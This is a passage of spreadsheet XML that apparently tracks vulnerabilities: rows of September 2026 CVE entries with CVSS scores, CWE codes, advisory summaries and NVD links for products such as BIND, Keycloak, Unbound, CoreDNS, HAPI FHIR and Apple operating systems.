          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-77895</t>
        </is>
      </c>
    </row>
    <row r="631">
      <c r="A631" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B631" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C631" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-79651</t>
        </is>
      </c>
      <c r="D631" s="5" t="n">
        <v>7.5</v>
      </c>
      <c r="E631" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F631" s="5" t="inlineStr">
        <is>
          <t>secalert@redhat.com</t>
        </is>
      </c>
      <c r="G631" s="5" t="inlineStr"/>
      <c r="H631" s="5" t="inlineStr"/>
      <c r="I631" s="5" t="inlineStr"/>
      <c r="J631" s="5" t="inlineStr">
        <is>
          <t>keycloak</t>
        </is>
      </c>
      <c r="K631" s="5" t="inlineStr"/>
      <c r="L631" s="5" t="inlineStr"/>
      <c r="M631" s="5" t="inlineStr"/>
      <c r="N631" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O631" s="5" t="inlineStr">
        <is>
          <t>2026-09-16</t>
        </is>
      </c>
      <c r="P631" s="5" t="inlineStr"/>
      <c r="Q631" s="5" t="inlineStr">
        <is>
          <t>CWE-400</t>
        </is>
      </c>
      <c r="R631" s="5" t="inlineStr">
        <is>
          <t>A flaw was found in the theme localization endpoints of the keycloak-services component, which is the core service responsible for authentication flows and theme management in Keycloak. The issue occurs because the system accepts arbitrary locale tags from unauthenticated requests and stores them in a permanent in-memory cache without limits. An attacker can exploit this by sending a large number of unique locale tags, eventually causing the server to run out of memory and crash.</t>
        </is>
      </c>
      <c r="S631" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-79651</t>
        </is>
      </c>
    </row>
    <row r="632">
      <c r="A632" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B632" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C632" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-80274</t>
        </is>
      </c>
      <c r="D632" s="5" t="n">
        <v>7.5</v>
      </c>
      <c r="E632" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F632" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="G632" s="5" t="inlineStr"/>
      <c r="H632" s="5" t="inlineStr"/>
      <c r="I632" s="5" t="inlineStr"/>
      <c r="J632" s="5" t="inlineStr"/>
      <c r="K632" s="5" t="inlineStr"/>
      <c r="L632" s="5" t="inlineStr"/>
      <c r="M632" s="5" t="inlineStr"/>
      <c r="N632" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O632" s="5" t="inlineStr">
        <is>
          <t>2026-09-16</t>
        </is>
      </c>
      <c r="P632" s="5" t="inlineStr"/>
      <c r="Q632" s="5" t="inlineStr">
        <is>
          <t>CWE-617</t>
        </is>
      </c>
      <c r="R632" s="5" t="inlineStr">
        <is>
          <t>If a BIND resolver sends a query for a DNSSEC-signed authoritative zone, and the authoritative server replies with a valid wildcard answer and signed NSEC3 proof, followed by an unsigned NSEC at the same owner name, it will trigger an unexpected program exit.
This issue affects BIND 9 versions 9.11.0 through 9.18.50, 9.20.0 through 9.20.27, 9.21.0 through 9.21.25, 9.11.3-S1 through 9.18.50-S1, and 9.20.9-S1 through 9.20.27-S1.</t>
        </is>
      </c>
      <c r="S632" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-80274</t>
        </is>
      </c>
    </row>
    <row r="633">
      <c r="A633" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B633" s="5" t="inlineStr">
        <is>
          <t>Newly scored</t>
        </is>
      </c>
      <c r="C633" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-81265</t>
        </is>
      </c>
      <c r="D633" s="5" t="n">
        <v>7.5</v>
      </c>
      <c r="E633" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F633" s="5" t="inlineStr">
        <is>
          <t>psirt@us.ibm.com</t>
        </is>
      </c>
      <c r="G633" s="5" t="inlineStr"/>
      <c r="H633" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="I633" s="5" t="inlineStr"/>
      <c r="J633" s="5" t="inlineStr"/>
      <c r="K633" s="5" t="inlineStr">
        <is>
          <t>langflow:langflow</t>
        </is>
      </c>
      <c r="L633" s="5" t="inlineStr"/>
      <c r="M633" s="5" t="inlineStr"/>
      <c r="N633" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O633" s="5" t="inlineStr">
        <is>
          <t>2026-09-10</t>
        </is>
      </c>
      <c r="P633" s="5" t="inlineStr"/>
      <c r="Q633" s="5" t="inlineStr">
        <is>
          <t>CWE-918</t>
        </is>
      </c>
      <c r="R633" s="5" t="inlineStr">
        <is>
          <t>IBM Langflow OSS 1.0.0 through 1.11.5.</t>
        </is>
      </c>
      <c r="S633" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-81265</t>
        </is>
      </c>
    </row>
    <row r="634">
      <c r="A634" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B634" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C634" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-81563</t>
        </is>
      </c>
      <c r="D634" s="5" t="n">
        <v>7.5</v>
      </c>
      <c r="E634" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F634" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="G634" s="5" t="inlineStr"/>
      <c r="H634" s="5" t="inlineStr"/>
      <c r="I634" s="5" t="inlineStr"/>
      <c r="J634" s="5" t="inlineStr"/>
      <c r="K634" s="5" t="inlineStr"/>
      <c r="L634" s="5" t="inlineStr"/>
      <c r="M634" s="5" t="inlineStr"/>
      <c r="N634" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O634" s="5" t="inlineStr">
        <is>
          <t>2026-09-16</t>
        </is>
      </c>
      <c r="P634" s="5" t="inlineStr"/>
      <c r="Q634" s="5" t="inlineStr">
        <is>
          <t>CWE-401</t>
        </is>
      </c>
      <c r="R634" s="5" t="inlineStr">
        <is>
          <t>A BIND resolver encountering an SVCB/HTTPS AliasMode record referencing 14 or more SVCB/HTTPS ServiceMode records may fail to properly deallocate internal resources. If this happens repeatedly, resource exhaustion will eventually prevent the resolver from performing new recursive lookups.
This issue affects BIND 9 versions 9.18.0 through 9.18.50, 9.20.0 through 9.20.27, 9.21.0 through 9.21.25, 9.18.11-S1 through 9.18.50-S1, and 9.20.9-S1 through 9.20.27-S1.</t>
        </is>
      </c>
      <c r="S634" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-81563</t>
        </is>
      </c>
    </row>
    <row r="635">
      <c r="A635" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B635" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C635" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-81634</t>
        </is>
      </c>
      <c r="D635" s="5" t="n">
        <v>7.5</v>
      </c>
      <c r="E635" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F635" s="5" t="inlineStr">
        <is>
          <t>sep@nlnetlabs.nl</t>
        </is>
      </c>
      <c r="G635" s="5" t="inlineStr"/>
      <c r="H635" s="5" t="n">
        <v>0.004</v>
      </c>
      <c r="I635" s="5" t="inlineStr"/>
      <c r="J635" s="5" t="inlineStr"/>
      <c r="K635" s="5" t="inlineStr"/>
      <c r="L635" s="5" t="inlineStr"/>
      <c r="M635" s="5" t="inlineStr"/>
      <c r="N635" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O635" s="5" t="inlineStr">
        <is>
          <t>2026-09-16</t>
        </is>
      </c>
      <c r="P635" s="5" t="inlineStr"/>
      <c r="Q635" s="5" t="inlineStr">
        <is>
          <t>CWE-122</t>
        </is>
      </c>
      <c r="R635" s="5" t="inlineStr">
        <is>
          <t>In NLnet Labs Unbound up to and including 1.26.0, a 255 length query name with a large TCP response can lead to a heap buffer overflow during the RRSet canonicalisation routine. This is caused by missing to add the first owner name into the buffer length check. A malicious actor operating a malicious name server or tampering with an incoming response to Unbound (canonicalisation happens before DNSSEC validation), can trigger the vulnerability.</t>
        </is>
      </c>
      <c r="S635" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-81634</t>
        </is>
      </c>
    </row>
    <row r="636">
      <c r="A636" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B636" s="5" t="inlineStr">
        <is>
          <t>Newly scored</t>
        </is>
      </c>
      <c r="C636" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-81665</t>
        </is>
      </c>
      <c r="D636" s="5" t="n">
        <v>7.5</v>
      </c>
      <c r="E636" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F636" s="5" t="inlineStr">
        <is>
          <t>secalert@redhat.com</t>
        </is>
      </c>
      <c r="G636" s="5" t="inlineStr"/>
      <c r="H636" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="I636" s="5" t="inlineStr"/>
      <c r="J636" s="5" t="inlineStr"/>
      <c r="K636" s="5" t="inlineStr"/>
      <c r="L636" s="5" t="inlineStr"/>
      <c r="M636" s="5" t="inlineStr"/>
      <c r="N636" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O636" s="5" t="inlineStr">
        <is>
          <t>2026-09-04</t>
        </is>
      </c>
      <c r="P636" s="5" t="inlineStr"/>
      <c r="Q636" s="5" t="inlineStr">
        <is>
          <t>CWE-122</t>
        </is>
      </c>
      <c r="R636" s="5" t="inlineStr">
        <is>
          <t>A heap-based buffer overflow was found in Corosync's Totem Process Group (totempg) message reassembly. When processing fragmented multicast messages, the buffer used to reassemble fragments lacks a runtime bounds check in release builds. A network-adjacent attacker able to send crafted multicast protocol messages to the cluster could cause a heap buffer overflow with attacker-controlled data. This can crash the Corosync daemon, causing a denial of service to the entire cluster, and may potentially allow further exploitation given sufficient heap-corruption control.</t>
        </is>
      </c>
      <c r="S636" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-81665</t>
        </is>
      </c>
    </row>
    <row r="637">
      <c r="A637" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B637" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C637" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-81736</t>
        </is>
      </c>
      <c r="D637" s="5" t="n">
        <v>7.5</v>
      </c>
      <c r="E637" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F637" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="G637" s="5" t="inlineStr"/>
      <c r="H637" s="5" t="inlineStr"/>
      <c r="I637" s="5" t="inlineStr"/>
      <c r="J637" s="5" t="inlineStr"/>
      <c r="K637" s="5" t="inlineStr"/>
      <c r="L637" s="5" t="inlineStr"/>
      <c r="M637" s="5" t="inlineStr"/>
      <c r="N637" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O637" s="5" t="inlineStr">
        <is>
          <t>2026-09-16</t>
        </is>
      </c>
      <c r="P637" s="5" t="inlineStr"/>
      <c r="Q637" s="5" t="inlineStr">
        <is>
          <t>CWE-1050</t>
        </is>
      </c>
      <c r="R637" s="5" t="inlineStr">
        <is>
          <t>If a BIND resolver has cached a tree of SVCB/HTTPS AliasMode records, and is then queried for the root of that tree, the resolver will spend disproportionate CPU time constructing the response.
This issue affects BIND 9 versions 9.18.0 through 9.18.50, 9.20.0 through 9.20.27, 9.21.0 through 9.21.25, 9.18.11-S1 through 9.18.50-S1, and 9.20.9-S1 through 9.20.27-S1.</t>
        </is>
      </c>
      <c r="S637" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-81736</t>
        </is>
      </c>
    </row>
    <row r="638">
      <c r="A638" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B638" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C638" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-81875</t>
        </is>
      </c>
      <c r="D638" s="5" t="n">
        <v>7.5</v>
      </c>
      <c r="E638" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F638" s="5" t="inlineStr">
        <is>
          <t>security-advisories@github.com</t>
        </is>
      </c>
      <c r="G638" s="5" t="inlineStr"/>
      <c r="H638" s="5" t="inlineStr"/>
      <c r="I638" s="5" t="inlineStr"/>
      <c r="J638" s="5" t="inlineStr"/>
      <c r="K638" s="5" t="inlineStr"/>
      <c r="L638" s="5" t="inlineStr"/>
      <c r="M638" s="5" t="inlineStr"/>
      <c r="N638" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O638" s="5" t="inlineStr">
        <is>
          <t>2026-09-16</t>
        </is>
      </c>
      <c r="P638" s="5" t="inlineStr"/>
      <c r="Q638" s="5" t="inlineStr">
        <is>
          <t>CWE-20, CWE-400, CWE-409</t>
        </is>
      </c>
      <c r="R638" s="5" t="inlineStr">
        <is>
          <t>HAPI FHIR is a complete implementation of the HL7 FHIR standard for healthcare interoperability in Java. Prior to version 6.9.12, SHCParser in org.hl7.fhir.r5/src/main/java/org/hl7/fhir/r5/elementmodel/SHCParser.java can consume attacker-controlled Smart Health Card JWT content whose header contains zip: "DEF" and whose small raw-DEFLATE payload expands to a very large value. SHCParser.decodeJWT() passes the decoded payload to SHCParser.inflate(), which accumulates all decompressed bytes in a ByteArrayOutputStream without an output-size limit before JSON parsing, and SHCParser.decompress() contains the same unbounded pattern. An application or validator service that accepts attacker-supplied SHC content can therefore suffer excessive heap allocation, severe garbage-collection pressure, request failure, process instability, or process termination. This issue is fixed in version 6.9.12.</t>
        </is>
      </c>
      <c r="S638" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-81875</t>
        </is>
      </c>
    </row>
    <row r="639">
      <c r="A639" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B639" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C639" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-81876</t>
        </is>
      </c>
      <c r="D639" s="5" t="n">
        <v>7.5</v>
      </c>
      <c r="E639" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F639" s="5" t="inlineStr">
        <is>
          <t>security-advisories@github.com</t>
        </is>
      </c>
      <c r="G639" s="5" t="inlineStr"/>
      <c r="H639" s="5" t="inlineStr"/>
      <c r="I639" s="5" t="inlineStr"/>
      <c r="J639" s="5" t="inlineStr"/>
      <c r="K639" s="5" t="inlineStr"/>
      <c r="L639" s="5" t="inlineStr"/>
      <c r="M639" s="5" t="inlineStr"/>
      <c r="N639" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O639" s="5" t="inlineStr">
        <is>
          <t>2026-09-16</t>
        </is>
      </c>
      <c r="P639" s="5" t="inlineStr"/>
      <c r="Q639" s="5" t="inlineStr">
        <is>
          <t>CWE-20, CWE-400, CWE-835</t>
        </is>
      </c>
      <c r="R639" s="5" t="inlineStr">
        <is>
          <t>HAPI FHIR is a complete implementation of the HL7 FHIR standard for healthcare interoperability in Java. Prior to version 6.9.12, SHCParser in org.hl7.fhir.r5/src/main/java/org/hl7/fhir/r5/elementmodel/SHCParser.java can enter an infinite loop while processing attacker-controlled Smart Health Card JWT content whose header contains zip: "DEF" and whose raw-DEFLATE payload is empty or truncated. SHCParser.decodeJWT() reaches SHCParser.inflate(), where Inflater.inflate() can return zero while Inflater.finished() remains false and Inflater.needsInput() is true. The loop also lacks an Inflater.needsDictionary() termination check, SHCParser.decompress() contains the same zero-progress pattern, and ResourceChecker.java can reach SHC parsing during file-format detection. A malformed validation request can pin a JVM worker thread indefinitely, and concurrent requests can exhaust all validation workers. This issue is fixed in version 6.9.12.</t>
        </is>
      </c>
      <c r="S639" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-81876</t>
        </is>
      </c>
    </row>
    <row r="640">
      <c r="A640" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B640" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C640" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-82399</t>
        </is>
      </c>
      <c r="D640" s="5" t="n">
        <v>7.5</v>
      </c>
      <c r="E640" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F640" s="5" t="inlineStr">
        <is>
          <t>security-advisories@github.com</t>
        </is>
      </c>
      <c r="G640" s="5" t="inlineStr"/>
      <c r="H640" s="5" t="inlineStr"/>
      <c r="I640" s="5" t="inlineStr"/>
      <c r="J640" s="5" t="inlineStr"/>
      <c r="K640" s="5" t="inlineStr"/>
      <c r="L640" s="5" t="inlineStr"/>
      <c r="M640" s="5" t="inlineStr"/>
      <c r="N640" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O640" s="5" t="inlineStr">
        <is>
          <t>2026-09-16</t>
        </is>
      </c>
      <c r="P640" s="5" t="inlineStr"/>
      <c r="Q640" s="5" t="inlineStr">
        <is>
          <t>CWE-770</t>
        </is>
      </c>
      <c r="R640" s="5" t="inlineStr">
        <is>
          <t>CoreDNS is a DNS server written in Go. Prior to 1.14.7, the DNS-over-HTTPS, DNS-over-HTTP/3, DNS-over-QUIC, and DNS-over-gRPC request paths in plugin/pkg/doh/doh.go, core/dnsserver/server_quic.go, and core/dnsserver/server_grpc.go call dns.Msg.Unpack on attacker-controlled DNS section counts before dns.DefaultMsgAcceptFunc validates the fixed header. An unauthenticated client can use DNS name compression and excessive section counts to amplify allocation before the plugin chain, so plugin-level rate limiting cannot prevent concurrent requests from exhausting memory and terminating CoreDNS. The ordinary UDP and TCP listeners are not affected because they validate the header first. This issue is fixed in version 1.14.7.</t>
        </is>
      </c>
      <c r="S640" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-82399</t>
        </is>
      </c>
    </row>
    <row r="641">
      <c r="A641" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B641" s="5" t="inlineStr">
        <is>
          <t>Newly scored</t>
        </is>
      </c>
      <c r="C641" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-84543</t>
        </is>
      </c>
      <c r="D641" s="5" t="n">
        <v>7.5</v>
      </c>
      <c r="E641" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F641" s="5" t="inlineStr">
        <is>
          <t>134c704f-9b21-4f2e-91b3-4a467353bcc0</t>
        </is>
      </c>
      <c r="G641" s="5" t="inlineStr"/>
      <c r="H641" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="I641" s="5" t="inlineStr"/>
      <c r="J641" s="5" t="inlineStr"/>
      <c r="K641" s="5" t="inlineStr">
        <is>
          <t>apple:macos</t>
        </is>
      </c>
      <c r="L641" s="5" t="inlineStr"/>
      <c r="M641" s="5" t="inlineStr"/>
      <c r="N641" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O641" s="5" t="inlineStr">
        <is>
          <t>2026-09-14</t>
        </is>
      </c>
      <c r="P641" s="5" t="inlineStr"/>
      <c r="Q641" s="5" t="inlineStr">
        <is>
          <t>CWE-125</t>
        </is>
      </c>
      <c r="R641" s="5" t="inlineStr">
        <is>
          <t>An out-of-bounds access issue was addressed with improved bounds checking. This issue is fixed in macOS Golden Gate 27, macOS Sequoia 15.8, macOS Tahoe 26.7. Connecting to a malicious SMB server may cause unexpected system termination or corrupt kernel memory.</t>
        </is>
      </c>
      <c r="S641" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-84543</t>
        </is>
      </c>
    </row>
    <row r="642">
      <c r="A642" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B642" s="5" t="inlineStr">
        <is>
          <t>Newly scored</t>
        </is>
      </c>
      <c r="C642" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-84544</t>
        </is>
      </c>
      <c r="D642" s="5" t="n">
        <v>7.5</v>
      </c>
      <c r="E642" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F642" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="G642" s="5" t="inlineStr"/>
      <c r="H642" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="I642" s="5" t="inlineStr"/>
      <c r="J642" s="5" t="inlineStr"/>
      <c r="K642" s="5" t="inlineStr">
        <is>
          <t>apple:macos</t>
        </is>
      </c>
      <c r="L642" s="5" t="inlineStr"/>
      <c r="M642" s="5" t="inlineStr"/>
      <c r="N642" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O642" s="5" t="inlineStr">
        <is>
          <t>2026-09-14</t>
        </is>
      </c>
      <c r="P642" s="5" t="inlineStr"/>
      <c r="Q642" s="5" t="inlineStr">
        <is>
          <t>CWE-190</t>
        </is>
      </c>
      <c r="R642" s="5" t="inlineStr">
        <is>
          <t>An integer overflow was addressed with improved input validation. This issue is fixed in macOS Golden Gate 27, macOS Sequoia 15.8, macOS Tahoe 26.7. Connecting to a malicious NFS server may cause unexpected system termination or corrupt kernel memory.</t>
        </is>
      </c>
      <c r="S642" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-84544</t>
        </is>
      </c>
    </row>
    <row r="643">
      <c r="A643" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B643" s="5" t="inlineStr">
        <is>
          <t>Newly scored</t>
        </is>
      </c>
      <c r="C643" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-84549</t>
        </is>
      </c>
      <c r="D643" s="5" t="n">
        <v>7.5</v>
      </c>
      <c r="E643" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F643" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="G643" s="5" t="inlineStr"/>
      <c r="H643" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="I643" s="5" t="inlineStr"/>
      <c r="J643" s="5" t="inlineStr"/>
      <c r="K643" s="5" t="inlineStr">
        <is>
          <t>apple:macos</t>
        </is>
      </c>
      <c r="L643" s="5" t="inlineStr"/>
      <c r="M643" s="5" t="inlineStr"/>
      <c r="N643" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O643" s="5" t="inlineStr">
        <is>
          <t>2026-09-14</t>
        </is>
      </c>
      <c r="P643" s="5" t="inlineStr"/>
      <c r="Q643" s="5" t="inlineStr">
        <is>
          <t>CWE-125</t>
        </is>
      </c>
      <c r="R643" s="5" t="inlineStr">
        <is>
          <t>An out-of-bounds read was addressed with improved bounds checking. This issue is fixed in macOS Golden Gate 27, macOS Sequoia 15.8, macOS Tahoe 26.7. Connecting to a malicious NFS server may cause unexpected system termination or corrupt kernel memory.</t>
        </is>
      </c>
      <c r="S643" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-84549</t>
        </is>
      </c>
    </row>
    <row r="644">
      <c r="A644" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B644" s="5" t="inlineStr">
        <is>
          <t>Newly scored</t>
        </is>
      </c>
      <c r="C644" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-84563</t>
        </is>
      </c>
      <c r="D644" s="5" t="n">
        <v>7.5</v>
      </c>
      <c r="E644" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F644" s="5" t="inlineStr">
        <is>
          <t>134c704f-9b21-4f2e-91b3-4a467353bcc0</t>
        </is>
      </c>
      <c r="G644" s="5" t="inlineStr"/>
      <c r="H644" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="I644" s="5" t="inlineStr"/>
      <c r="J644" s="5" t="inlineStr"/>
      <c r="K644" s="5" t="inlineStr">
        <is>
          <t>apple:macos</t>
        </is>
      </c>
      <c r="L644" s="5" t="inlineStr"/>
      <c r="M644" s="5" t="inlineStr"/>
      <c r="N644" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O644" s="5" t="inlineStr">
        <is>
          <t>2026-09-14</t>
        </is>
      </c>
      <c r="P644" s="5" t="inlineStr"/>
      <c r="Q644" s="5" t="inlineStr">
        <is>
          <t>CWE-843</t>
        </is>
      </c>
      <c r="R644" s="5" t="inlineStr">
        <is>
          <t>A logic issue was addressed with improved checks. This issue is fixed in macOS Golden Gate 27, macOS Sequoia 15.8, macOS Tahoe 26.7. An app may be able to cause unexpected system termination.</t>
        </is>
      </c>
      <c r="S644" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-84563</t>
        </is>
      </c>
    </row>
    <row r="645">
      <c r="A645" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B645" s="5" t="inlineStr">
        <is>
          <t>Newly scored</t>
        </is>
      </c>
      <c r="C645" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-84598</t>
        </is>
      </c>
      <c r="D645" s="5" t="n">
        <v>7.5</v>
      </c>
      <c r="E645" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F645" s="5" t="inlineStr">
        <is>
          <t>134c704f-9b21-4f2e-91b3-4a467353bcc0</t>
        </is>
      </c>
      <c r="G645" s="5" t="inlineStr"/>
      <c r="H645" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="I645" s="5" t="inlineStr"/>
      <c r="J645" s="5" t="inlineStr"/>
      <c r="K645" s="5" t="inlineStr">
        <is>
          <t>apple:ipados, apple:iphone_os</t>
        </is>
      </c>
      <c r="L645" s="5" t="inlineStr"/>
      <c r="M645" s="5" t="inlineStr"/>
      <c r="N645" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O645" s="5" t="inlineStr">
        <is>
          <t>2026-09-14</t>
        </is>
      </c>
      <c r="P645" s="5" t="inlineStr"/>
      <c r="Q645" s="5" t="inlineStr">
        <is>
          <t>CWE-22</t>
        </is>
      </c>
      <c r="R645" s="5" t="inlineStr">
        <is>
          <t>A path traversal issue was addressed with improved path validation. This issue is fixed in iOS 26.7 and iPadOS 26.7, iOS 27 and iPadOS 27. An attacker with physical access to a trust-paired device may be able to read and write arbitrary files.</t>
        </is>
      </c>
      <c r="S645" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-84598</t>
        </is>
      </c>
    </row>
    <row r="646">
      <c r="A646" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B646" s="5" t="inlineStr">
        <is>
          <t>Newly scored</t>
        </is>
      </c>
      <c r="C646" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-84629</t>
        </is>
      </c>
      <c r="D646" s="5" t="n">
        <v>7.5</v>
      </c>
      <c r="E646" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F646" s="5" t="inlineStr">
        <is>
          <t>134c704f-9b21-4f2e-91b3-4a467353bcc0</t>
        </is>
      </c>
      <c r="G646" s="5" t="inlineStr"/>
      <c r="H646" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="I646" s="5" t="inlineStr"/>
      <c r="J646" s="5" t="inlineStr"/>
      <c r="K646" s="5" t="inlineStr">
        <is>
          <t>apple:ipados, apple:iphone_os, apple:tvos, apple:visionos, apple:watchos</t>
        </is>
      </c>
      <c r="L646" s="5" t="inlineStr"/>
      <c r="M646" s="5" t="inlineStr"/>
      <c r="N646" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O646" s="5" t="inlineStr">
        <is>
          <t>2026-09-14</t>
        </is>
      </c>
      <c r="P646" s="5" t="inlineStr"/>
      <c r="Q646" s="5" t="inlineStr">
        <is>
          <t>CWE-862</t>
        </is>
      </c>
      <c r="R646" s="5" t="inlineStr">
        <is>
          <t>This issue was addressed with additional entitlement checks. This issue is fixed in iOS 27 and iPadOS 27, tvOS 27, visionOS 27, watchOS 27. An app may be able to fingerprint the user.</t>
        </is>
      </c>
      <c r="S646" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-84629</t>
        </is>
      </c>
    </row>
